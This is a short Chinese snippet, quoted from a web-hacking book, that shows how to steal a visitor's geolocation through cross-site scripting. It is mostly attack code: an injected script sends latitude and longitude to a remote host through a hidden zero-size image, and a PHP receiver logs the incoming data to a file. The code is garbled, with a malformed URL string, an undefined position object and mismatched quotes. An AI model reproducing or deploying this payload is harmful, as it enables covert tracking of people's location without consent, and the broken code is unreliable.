通过xss盗取地理位置

 

注入sxx代码：

<script>

    var today =  new Date().toLocaleString() + '星期' + '日一二三四五六'.charAt(new Date().getDay());

    document.getElementById('remote').src = "htttp:// + today + "----" + encodeURIComponent(position.coords.latitude) + "," + encodeURIComponent(position.coords.longitude);

</script> 

<img id=“remote" src="" width=0 height=0>

test.php代码：

<?php

    $fh = fopen("file.txt",'a+');

    fwrite($fh,$_GET["txt"]);

    fwrite($fh,"\r\n");

    fclose($fh);

    ?>

摘自--《web前端黑客技术揭秘》